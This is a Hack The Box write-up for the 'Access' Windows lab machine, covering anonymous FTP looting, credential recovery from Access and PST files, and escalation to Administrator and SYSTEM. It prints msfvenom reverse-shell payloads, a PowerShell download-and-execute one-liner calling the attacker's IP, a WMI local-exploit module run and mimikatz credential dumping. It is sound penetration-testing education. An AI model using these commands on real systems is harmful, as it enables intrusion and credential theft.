Tags: hack the box, windows, runas, mimikatz
If you didn’t know, egre55 has put out a lot of boxes for HTB. Access is another egre55 machine that I thoroughly enjoyed (the other egre55 box I have a write-up for is Reel, which I highly recommend for learning some Active Directory techniques). I was fortunate enough to solve it using what I assume to be the intended method. However, the real learning for me happened on my second time through. Encrypting File System (EFS) was a completely foreign concept to me (not surprising if you know that I have a strong preference for Linux). I enjoyed digging into EFS and what use of EFS means for us as hackers. As usual, @egre55 put out an awesome box!
As usual, we start off with a masscan
followed by a targeted nmap
.
masscan -e tun0 -p0-65535,U:0-65535 --rate 700 -oL scan.10.10.10.105.all 10.10.10.105
═════════════════════════════════════════════════════════════════════════════════════
open tcp 80 10.10.10.98 1538253209
open tcp 23 10.10.10.98 1538253316
open tcp 21 10.10.10.98 1538253330
nmap -p 21,23,80 -sC -sV -oN nmap.scan 10.10.10.98
══════════════════════════════════════════════════
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_ SYST: Windows_NT
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Our nmap scan reports that anonymous ftp is allowed, so that’s an easy first step to see what’s being offered by ftp.
We can recursively download the contents of the ftp server using wget
. After grabbing the ftp server contents, the command will drop them into a folder of the same name as the hostname used in the command (10.10.10.98 in this case).
wget --no-passive-ftp -r ftp://anonymous:epi@10.10.10.98/
After the wget
, we’re left with the following directory structure locally.
find 10.10.10.98/
═════════════════
10.10.10.98/
10.10.10.98/Backups
10.10.10.98/Backups/backup.mdb
10.10.10.98/Engineer
10.10.10.98/Engineer/Access Control.zip
We can try to unzip Acess Control.zip, however, it is password protected. This leaves us with backup.mdb, which is a Microsoft Access Database. Let’s see if there’s anything of interest there.
First, let’s grab some software that understands how to read an Access database; enter kexi.
KEXI is an open source visual database applications creator, a long-awaited competitor for programs like MS Access or Filemaker.
apt install kexi
-------------8<-------------
kexi-3.1 backup.mdb
After opening backup.mdb with kexi
, we’re met with a few prompts. We’ll click through these, generally accepting or nexting whatever popped up until we are able to click Finish
. Once the steps to import the project (all those clicks) are complete, we’re greeted with the screen depicted below.
Within kexi, after some exploration we see the auth_user table and find the follwing usernames and passwords, of which engineer sounds promising.
Armed with a likely password, it’s time to revisit the password protected zip file. Linux’s unzip
utility complains of an unsupported compression method, so let’s try it with 7-Zip
.
7z x Access\ Control.zip
# pass: access4u@security
The zip uncompresses to reveal Access Control.pst, an Outlook PST file.
Similar to the previous step, now we need to find some tool that can process PST files on Linux. The pst-utils
package has a tool readpst
that works very nicely here.
apt install pst-utils
-------------8<-------------
readpst -D -r Access\ Control.pst
readpst options used:
-D
Include deleted items in the output.
-r
Changes the output format to Recursive...will put all emails in a file called "mbox"
The command above will create an mbox file that we can read using the cat
command. We’re rewarded for our efforts with a username and password!
Access Control.mbox
═══════════════════
-------------8<-------------
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
-------------8<-------------
Now that we have a username and password, it’s time to login!
# user: security
# pass: 4Cc3ssC0ntr0ller
telnet 10.10.10.98
-------------8<-------------
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
\o/ - access level: security
During enumeration, cmdkey
lists out some interesting information, specifically that there are stored credentials that are available for use!
cmdkey /list
════════════
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
Even though we can’t dump these credentials or see what they are, we can use them directly with the runas
command. There are a lot of ways to leverage this, but a meterpreter shell is pretty simple to execute, so we’ll take that approach. To get the exe to target, we can use a method I really like to transfer files to/from kali and windows.
First generate the exe with msfvenom
.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=12345 -f exe -o meter-rev-12345.exe
Next, spin up an smb server on kali pointed at the directory where the exe resides.
impacket-smbserver epi /root/htb/access
On target, simply copy the file from kali using a normal UNC path.
C:\Users\security> copy \\10.10.14.77\epi\meter-rev-12345.exe
copy \\10.10.14.77\epi\meter-rev-12345.exe
1 file(s) copied.
Spin up a listener on kali.
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf5 exploit(multi/handler) > set lport 12345
lport => 12345
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.77:12345
Finally, on target, use the cached credentials to execute the reverse shell.
C:\Users\security> runas /savecred /user:ACCESS\Administrator .\meter-rev-12345.exe
We’ll wrap it up with a quick demonstration of running powershell commands from meterpreter.
meterpreter > getuid
Server username: ACCESS\Administrator
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_execute "get-content C:\users\administrator\desktop\root.txt | measure -character"
[+] Command execution completed:
Lines Words Characters Property
----- ----- ---------- --------
32
\o/ - administrator access
There is a second way to root this machine. It’s not interesting for the exploit itself, because it’s really just a few metasploit modules strung together. However, it IS interesting for what it teaches. I only found out about this because some people were asking questions about why they couldn’t view root.txt as SYSTEM in NetSec Focus chat. So, while this is a method to get SYSTEM on the box, it is not a method to get root.txt unless someone before us has used the stored credentials discussed above.
Restarting our process from the point where we logged in through telnet
, we can get a meterpreter shell by using the web delivery module.
msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set target 2
target => 2
msf5 exploit(multi/script/web_delivery) > set srvport 8081
srvport => 8081
msf5 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > set lhost tun0
lhost => tun0
msf5 exploit(multi/script/web_delivery) > set lport 12345
lport => 12345
msf5 exploit(multi/script/web_delivery) > exploit -j
[*] Local IP: http://192.168.100.234:8081/ovuR3ArPYFio
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $t=new-object net.webclient;$t.proxy=[Net.WebRequest]::GetSystemWebProxy();$t.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $t.downloadstring('http://10.10.14.77:8081/ovuR3ArPYFio');
With the listener running, we need to copy/paste the powershell command above into the target window.
C:\Users\security\Documents>powershell.exe -nop -w hidden -c $b=new-object net.webclient;$b.proxy=[Net.WebRequest]::GetSystemWebProxy();$b.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $b.downloadstring('http://10.10.14.77:8081/6ORXQO');
After running the above command on target, we receive a meterpreter callback in msfconsole.
This machine is vulnerable to Microsoft Windows WMI - Recieve Notification Exploit. We can use our existing meterpreter session to get a SYSTEM shell on target using the corresponding metasploit module.
msf5 exploit(multi/script/web_delivery) > use windows/local/ms16_014_wmi_recv_notif
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set session 1
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > exploit
[*] Started reverse TCP handler on 10.10.14.77:4444
[*] Launching notepad to host the exploit...
[+] Process 2372 launched.
[*] Reflectively injecting the exploit DLL into 2372...
[*] Injecting exploit into 2372...
[*] Exploit injected. Injecting payload into 2372...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Command shell session 2 opened (10.10.14.77:4444 -> 10.10.10.98:49170) at 2018-10-04 19:10:44 -0500
C:\Users\security> whoami
nt authority\system
\o/ - SYSTEM access
If our primary goal was strictly flags, a SYSTEM shell on this target wouldn’t actually help us. This is because root.txt is encrypted using EFS. EFS is a part of NTFS and it provides the ability to encrypt files and folders, instead of a whole drive.
Even with a SYSTEM shell, we can’t view the contents of root.txt as illustrated below.
C:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.
C:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
ACCESS\Administrator:(I)(F)
Successfully processed 1 files; Failed processing 0 files
A box creator with a penchant for trolling may have created a root.txt whose contents are “Access is denied.” (take notes incidrthreat) However, this is not the case, and the cipher command can show us that it is indeed encrypted.
C:\Users\Administrator\Desktop>cipher
cipher
Listing C:\Users\Administrator\Desktop\
New files added to this directory will not be encrypted.
E root.txt
Files encrypted with EFS can only be decrypted by using the RSA private key(s) matching the previously used public key(s). The stored copy of the user’s private key is ultimately protected by the user’s logon password.
This technique only works if someone else has actually utilized the stored credentials with runas
or something similar. We’ll look at mimikatz
run against a freshly reverted box and against one where we used the stored credentials.
Keeping with our meterpreter theme for this machine, we’ll upgrade our SYSTEM cmd shell to a meterpreter shell.
First a quick sessions -u 2
will net us a 32-bit meterpreter shell.
msf exploit(windows/local/ms16_014_wmi_recv_notif) > sessions -u 2
-------------8<-------------
meterpreter x86/windows NT AUTHORITY\SYSTEM @ ACCESS 10.10.14.77:4433 -> 10.10.10.98:49161 (10.10.10.98)
-------------8<-------------
Then, we need a 64-bit meterpreter to run mimikatz
, so we can use the payload_inject module to accomplish that.
msf exploit(windows/local/ms16_014_wmi_recv_notif) > use windows/local/payload_inject
msf5 exploit(windows/local/payload_inject) > set session 3
msf5 exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/payload_inject) > set lhost tun0
msf5 exploit(windows/local/payload_inject) > set lport 12346
msf5 exploit(windows/local/payload_inject) > exploit
-------------8<-------------
[*] Meterpreter session 4 opened (10.10.14.77:12346 -> 10.10.10.98:49195) at 2018-10-05 09:28:04 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
This is what mimikatz
is able to gather for us on a freshly reverted instance of the box.
meterpreter > load kiwi
Loading extension kiwi...
-------------8<-------------
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
-------------8<-------------
security ACCESS 4Cc3ssC0ntr0ller
-------------8<-------------
After performing a command using the stored credentials like we did in the runas section, we can clearly see the Administrator account’s password.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
-------------8<-------------
Administrator ACCESS 55Acc3ssS3cur1ty@megacorp
security ACCESS 4Cc3ssC0ntr0ller
-------------8<-------------
With the Administrator’s password, we can log in via telnet again and check out root.txt without issue.
# user: Administrator
# pass: 55Acc3ssS3cur1ty@megacorp
telnet 10.10.10.98
-------------8<-------------
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\Administrator>powershell -c "cat desktop\root.txt | measure -character"
Lines Words Characters Property
----- ----- ---------- --------
32
There we have it, if the credentials have been used recently, this method would lead to a flag, but that definitely was not the case for some folks.
I hope you enjoyed this write-up, or at least found something useful. Drop me a line on the HTB forums or in chat @ NetSec Focus.